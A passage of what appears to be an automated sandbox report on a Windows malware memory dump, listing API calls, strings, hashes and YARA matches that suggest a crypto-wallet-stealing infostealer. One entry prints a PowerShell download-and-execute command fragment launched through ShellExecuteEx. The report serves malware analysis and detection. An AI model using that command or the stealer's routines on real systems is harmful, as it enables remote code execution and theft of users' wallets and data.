                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$DefaultLangUser
                                    • String ID: *
                                    • API String ID: 1494266314-163128923
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00C34FCA
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C34FD1
                                    • InternetOpenA.WININET(00C50DDF,00000000,00000000,00000000,00000000), ref: 00C34FEA
                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00C35011
                                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00C35041
                                    • InternetCloseHandle.WININET(?), ref: 00C350B9
                                    • InternetCloseHandle.WININET(?), ref: 00C350C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                    • String ID:
                                    • API String ID: 3066467675-0
                                    APIs
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00C48426
                                    • wsprintfA.USER32 ref: 00C48459
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00C4847B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C4848C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C48499
                                      • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                    • RegQueryValueExA.ADVAPI32(00000000,019DDFB8,00000000,000F003F,?,00000400), ref: 00C484EC
                                    • lstrlen.KERNEL32(?), ref: 00C48501
                                    • RegQueryValueExA.ADVAPI32(00000000,019DDEE0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00C50B34), ref: 00C48599
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C48608
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C4861A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 3896182533-4073750446
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C476A4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C476AB
                                    • RegOpenKeyExA.ADVAPI32(80000002,019CB8C0,00000000,00020119,00000000), ref: 00C476DD
                                    • RegQueryValueExA.ADVAPI32(00000000,019DDF58,00000000,00000000,?,000000FF), ref: 00C476FE
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C47708
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: f3dc009c368efd62b825e729980adc737047c58ff353db2ff5181bbc76cbe969
                                    • Instruction ID: a110b61d471dee19dffd231d9fa031bf373940aae3c8c09fcb47d471dd02277e
                                    • Opcode Fuzzy Hash: f3dc009c368efd62b825e729980adc737047c58ff353db2ff5181bbc76cbe969
                                    • Instruction Fuzzy Hash: 1B01A7B4A00204BFEB04DBE1DC4DF6D77B8EB84701F144164FA08E7291D77099488B52
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C47734
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C4773B
                                    • RegOpenKeyExA.ADVAPI32(80000002,019CB8C0,00000000,00020119,00C476B9), ref: 00C4775B
                                    • RegQueryValueExA.ADVAPI32(00C476B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00C4777A
                                    • RegCloseKey.ADVAPI32(00C476B9), ref: 00C47784
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: 98d6726c408a583ea425bb905b240fc89791585d775d11bfa96bcf728019922a
                                    • Instruction ID: 4237b3bcbb2dde81ed98244de9fa2fe89684e6cc0aefac42e7ffb4c64e0123b2
                                    • Opcode Fuzzy Hash: 98d6726c408a583ea425bb905b240fc89791585d775d11bfa96bcf728019922a
                                    • Instruction Fuzzy Hash: 280144B5A40308BFE714DBE1DC4AFAEB7B8EB44701F144565FA09A7281D67056448B52
                                    APIs
                                    • memset.MSVCRT ref: 00C440D5
                                    • RegOpenKeyExA.ADVAPI32(80000001,019DD1D8,00000000,00020119,?), ref: 00C440F4
                                    • RegQueryValueExA.ADVAPI32(?,019DDAC0,00000000,00000000,00000000,000000FF), ref: 00C44118
                                    • RegCloseKey.ADVAPI32(?), ref: 00C44122
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C44147
                                    • lstrcat.KERNEL32(?,019DD880), ref: 00C4415B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValuememset
                                    • String ID:
                                    • API String ID: 2623679115-0
                                    • Opcode ID: 3ecbaffbe4551e526c473717ac0dd4d14a06eda0be06cbdc5262610a81280502
                                    • Instruction ID: fe2b4e4b4737d46f42a50610ca16fe18ca494ac8b76d27fe4613d7a4ae8fd9c5
                                    • Opcode Fuzzy Hash: 3ecbaffbe4551e526c473717ac0dd4d14a06eda0be06cbdc5262610a81280502
                                    • Instruction Fuzzy Hash: D24165B6910108AFDB14FBA0DC46FFE737DBBC8300F444558BA1A96181EA755B8C9B92
                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C399EC
                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C39A11
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00C39A31
                                    • ReadFile.KERNEL32(000000FF,?,00000000,00C3148F,00000000), ref: 00C39A5A
                                    • LocalFree.KERNEL32(00C3148F), ref: 00C39A90
                                    • CloseHandle.KERNEL32(000000FF), ref: 00C39A9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: 335eee0acaed992b23f2afe4dac044ea7638a4e986624f3153d02d6b741a13b4
                                    • Instruction ID: 0863342ab00790bbe079c8ef6947ff40a457b4fbdd3ded9186e4bdda3083aca4
                                    • Opcode Fuzzy Hash: 335eee0acaed992b23f2afe4dac044ea7638a4e986624f3153d02d6b741a13b4
                                    • Instruction Fuzzy Hash: 3E316D74A00209EFDB14DF95D885BAE77B5FF88300F108258E915A7290C774AA85DFA1
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String___crt$Typememset
                                    • String ID:
                                    • API String ID: 3530896902-3916222277
                                    • Opcode ID: f4b14b8070fe2d57f0b4654b81b73ff77d1eb59f7658a1e746dd5f4a893d2c3b
                                    • Instruction ID: 47b6fe5c9c841a37abd221e008066225d2dd9aaef4bc4fbef377b1db920e9f59
                                    • Opcode Fuzzy Hash: f4b14b8070fe2d57f0b4654b81b73ff77d1eb59f7658a1e746dd5f4a893d2c3b
                                    • Instruction Fuzzy Hash: 924126B150179CAEDB218B24CCC4FFBBBE8BF15304F1444E8E99A86192E2719B45DF20
                                    APIs
                                    • lstrcat.KERNEL32(?,019DD988), ref: 00C447DB
                                      • Part of subcall function 00C48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C48E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C44801
                                    • lstrcat.KERNEL32(?,?), ref: 00C44820
                                    • lstrcat.KERNEL32(?,?), ref: 00C44834
                                    • lstrcat.KERNEL32(?,019CB270), ref: 00C44847
                                    • lstrcat.KERNEL32(?,?), ref: 00C4485B
                                    • lstrcat.KERNEL32(?,019DD078), ref: 00C4486F
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C48D90: GetFileAttributesA.KERNEL32(00000000,?,00C31B54,?,?,00C5564C,?,?,00C50E1F), ref: 00C48D9F
                                      • Part of subcall function 00C44570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C44580
                                      • Part of subcall function 00C44570: RtlAllocateHeap.NTDLL(00000000), ref: 00C44587
                                      • Part of subcall function 00C44570: wsprintfA.USER32 ref: 00C445A6
                                      • Part of subcall function 00C44570: FindFirstFileA.KERNEL32(?,?), ref: 00C445BD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                    • String ID:
                                    • API String ID: 2540262943-0
                                    • Opcode ID: c0bb86bb43a9afb980b20b292558d8e938d732ee7c711599f681a8297713ed11
                                    • Instruction ID: 3f49a63a5bbfa89121954b00da500d256c592ecf47b88042986d5367745f69d9
                                    • Opcode Fuzzy Hash: c0bb86bb43a9afb980b20b292558d8e938d732ee7c711599f681a8297713ed11
                                    • Instruction Fuzzy Hash: 003171B29002086BDB14FBB0DC86EED737CBB58700F444599B319A6081EE7497CDDB92
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00C42D85
                                    Strings
                                    • <, xrefs: 00C42D39
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00C42D04
                                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00C42CC4
                                    • ')", xrefs: 00C42CB3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 3031569214-898575020
                                    • Opcode ID: 1627c5fa34456e7e1bc6e31d97e8366d35d1fc20d408622ad43b0ac45bd59360
                                    • Instruction ID: c04cc2160377460386b987b843223b78a56b9f87be3c614019101501125faada
                                    • Opcode Fuzzy Hash: 1627c5fa34456e7e1bc6e31d97e8366d35d1fc20d408622ad43b0ac45bd59360
                                    • Instruction Fuzzy Hash: B841DD71C502089AEB14FFA1C892BEDBB74FF14304F504129F416A61D2DF746A8AEF95
                                    APIs
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00C39F41
                                      • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$AllocLocal
                                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                    • API String ID: 4171519190-1096346117
                                    • Opcode ID: 2548ce65c7fada2758d301de7fbcd5543fd493f1212526cdfd6f57df692b2145
                                    • Instruction ID: 0175bd1c0d710998d05489da103ab0a46acd7d871033124fda56a67150471746
                                    • Opcode Fuzzy Hash: 2548ce65c7fada2758d301de7fbcd5543fd493f1212526cdfd6f57df692b2145
                                    • Instruction Fuzzy Hash: 67615E75A50208AFDB28EFA4CC96FED7775BF44304F048018F90A9B191EB746A46DB52
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 00C4696C
                                    • sscanf.NTDLL ref: 00C46999
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00C469B2
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00C469C0
                                    • ExitProcess.KERNEL32 ref: 00C469DA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$System$File$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 2533653975-0
                                    • Opcode ID: 03a5d5951847db2f18000d8578f1f804dccc2f651e29417838c0f2ac6fdc649f
                                    • Instruction ID: bbdb9b450b98a056d6c840cc88b7d4dc4e9053ac0e906248e22c998ff1303f63
                                    • Opcode Fuzzy Hash: 03a5d5951847db2f18000d8578f1f804dccc2f651e29417838c0f2ac6fdc649f
                                    • Instruction Fuzzy Hash: 7021EA75D04208AFDF08EFE4E9499EEB7B5BF48300F04852AE41AB3250EB345609CB66
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C47E37
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C47E3E
                                    • RegOpenKeyExA.ADVAPI32(80000002,019CB8F8,00000000,00020119,?), ref: 00C47E5E
                                    • RegQueryValueExA.ADVAPI32(?,019DD278,00000000,00000000,000000FF,000000FF), ref: 00C47E7F
                                    • RegCloseKey.ADVAPI32(?), ref: 00C47E92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 2408f0725655bf02c29892ffddbea53502a67b5de796209c8c4a5bbb4a8cada5
                                    • Instruction ID: 074f3c998993c1ee3f773f4b9f474fcc115dd2070a7941626f9b3756b8b8773b
                                    • Opcode Fuzzy Hash: 2408f0725655bf02c29892ffddbea53502a67b5de796209c8c4a5bbb4a8cada5
                                    • Instruction Fuzzy Hash: 12119EB1A44205EFD714CF96DC49FBFBBB8FB44B11F104269FA19A7280D77458448BA2
                                    APIs
                                    • StrStrA.SHLWAPI(019DDA60,?,?,?,00C4140C,?,019DDA60,00000000), ref: 00C4926C
                                    • lstrcpyn.KERNEL32(00E7AB88,019DDA60,019DDA60,?,00C4140C,?,019DDA60), ref: 00C49290
                                    • lstrlen.KERNEL32(?,?,00C4140C,?,019DDA60), ref: 00C492A7
                                    • wsprintfA.USER32 ref: 00C492C7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpynlstrlenwsprintf
                                    • String ID: %s%s
                                    • API String ID: 1206339513-3252725368
                                    • Opcode ID: 65f9723c1dfb9f69dffc7af861c15161e24a4550ec677cd9733b19d9f5f3e885
                                    • Instruction ID: 28876ff8b42362dc6559dcc23428857f4689c530d048d04c378d6f7cb0d45bdf
                                    • Opcode Fuzzy Hash: 65f9723c1dfb9f69dffc7af861c15161e24a4550ec677cd9733b19d9f5f3e885
                                    • Instruction Fuzzy Hash: CA01E975500108FFCB04DFE8C989EAE7BB9EB84351F148158F909AB200C671AA84DB91
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C312B4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C312BB
                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00C312D7
                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00C312F5
                                    • RegCloseKey.ADVAPI32(?), ref: 00C312FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 547e4fbe46c81b838e4184819c29e58d3e41b5bb5e31121aef6162c703d37545
                                    • Instruction ID: cc50ff314bea2a6fcedc98e33b51c9ca0b1af74312210505acee6038ffae1396
                                    • Opcode Fuzzy Hash: 547e4fbe46c81b838e4184819c29e58d3e41b5bb5e31121aef6162c703d37545
                                    • Instruction Fuzzy Hash: 570149B5A40208BFDB04DFD1DC49FAEB7BCEB88701F048155FA09E7280D6719A458F51
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00C46663
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00C46726
                                    • ExitProcess.KERNEL32 ref: 00C46755
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                    • String ID: <
                                    • API String ID: 1148417306-4251816714
                                    • Opcode ID: 15667b520a7b59246857345257d210bd1953ee04d44ce0e79db77209ce1c0f25
                                    • Instruction ID: e696c0407e519717f425ceaa921f1f18a762fc3e7d01dffd573a767634519459
                                    • Opcode Fuzzy Hash: 15667b520a7b59246857345257d210bd1953ee04d44ce0e79db77209ce1c0f25
                                    • Instruction Fuzzy Hash: 043129B1801218AEEB14EBA0DC96BDEB778BF54300F404199F20976191DF746B89DF6A
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C50E28,00000000,?), ref: 00C4882F
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C48836
                                    • wsprintfA.USER32 ref: 00C48850
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    • Opcode ID: 2523d72af5aa42835b935578563581522d0d130ce7e61e38a9ca00defc0aabf2
                                    • Instruction ID: 1af1bd7091b57e298001ce37945bf9e690a004dc15e5fa3eea4bb93ad845d9d2
                                    • Opcode Fuzzy Hash: 2523d72af5aa42835b935578563581522d0d130ce7e61e38a9ca00defc0aabf2
                                    • Instruction Fuzzy Hash: C52130B1A40204AFDB04DFD5DD49FAEBBB8FB48701F144169F609B7280C77999448BA2
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00C4951E,00000000), ref: 00C48D5B
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C48D62
                                    • wsprintfW.USER32 ref: 00C48D78
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesswsprintf
                                    • String ID: %hs
                                    • API String ID: 769748085-2783943728
                                    • Opcode ID: 0369ca3acb2b4c2845fa90cff2909a0d1ca3424edbead2772259e0ebbef62215
                                    • Instruction ID: 095d7da9c801bd7be6e0732987677f78e7540a6bbb865775ddad10362dfefdbe
                                    • Opcode Fuzzy Hash: 0369ca3acb2b4c2845fa90cff2909a0d1ca3424edbead2772259e0ebbef62215
                                    • Instruction Fuzzy Hash: CDE08CB4A40208BFD704DB95DC0EE6D77BCEB84702F0800A4FD0DA7280DA719E489BA6
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                      • Part of subcall function 00C48B60: GetSystemTime.KERNEL32(00C50E1A,019D9B48,00C505AE,?,?,00C313F9,?,0000001A,00C50E1A,00000000,?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C48B86
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C3A2E1
                                    • lstrlen.KERNEL32(00000000,00000000), ref: 00C3A3FF
                                    • lstrlen.KERNEL32(00000000), ref: 00C3A6BC
                                      • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                    • DeleteFileA.KERNEL32(00000000), ref: 00C3A743
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: d6b7584c5af3f2619a6c79c59b32abe5a6e98dcf547b751af9e9b0f22b85e5ad
                                    • Instruction ID: b86c1a46df95812064394d63fd708a5952333ebb78e9584a6ebe85c475cc6ae3
                                    • Opcode Fuzzy Hash: d6b7584c5af3f2619a6c79c59b32abe5a6e98dcf547b751af9e9b0f22b85e5ad
                                    • Instruction Fuzzy Hash: 93E1EE72850108ABEB14FBA4DC96EEE7338FF54300F548169F516B2091EF306A4DEB66
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                      • Part of subcall function 00C48B60: GetSystemTime.KERNEL32(00C50E1A,019D9B48,00C505AE,?,?,00C313F9,?,0000001A,00C50E1A,00000000,?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C48B86
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C3D481
                                    • lstrlen.KERNEL32(00000000), ref: 00C3D698
                                    • lstrlen.KERNEL32(00000000), ref: 00C3D6AC
                                    • DeleteFileA.KERNEL32(00000000), ref: 00C3D72B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 46a440ef283b77768bfd31f00eb3311d55b85adf028c13aa51d6d5f58d19c737
                                    • Instruction ID: a38e6b5555c82d73054e6f91391e463e3e123c6ca4d1d4f5fff4c61b2c1961ce
                                    • Opcode Fuzzy Hash: 46a440ef283b77768bfd31f00eb3311d55b85adf028c13aa51d6d5f58d19c737
                                    • Instruction Fuzzy Hash: 3A912D72850108ABEB04FBA0DC96EEE7338FF54304F544569F517B6092EF346A49EB62
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                      • Part of subcall function 00C48B60: GetSystemTime.KERNEL32(00C50E1A,019D9B48,00C505AE,?,?,00C313F9,?,0000001A,00C50E1A,00000000,?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C48B86
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C3D801
                                    • lstrlen.KERNEL32(00000000), ref: 00C3D99F
                                    • lstrlen.KERNEL32(00000000), ref: 00C3D9B3
                                    • DeleteFileA.KERNEL32(00000000), ref: 00C3DA32
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: f9234e9bd46cec9cf839bdda07d9ba2ba9c14a8e33b8e241be8001822baa8316
                                    • Instruction ID: f04fc69fbe30e0bccd10caf7b993fddd4b57d1c4bc99ad49986d468c465dba4b
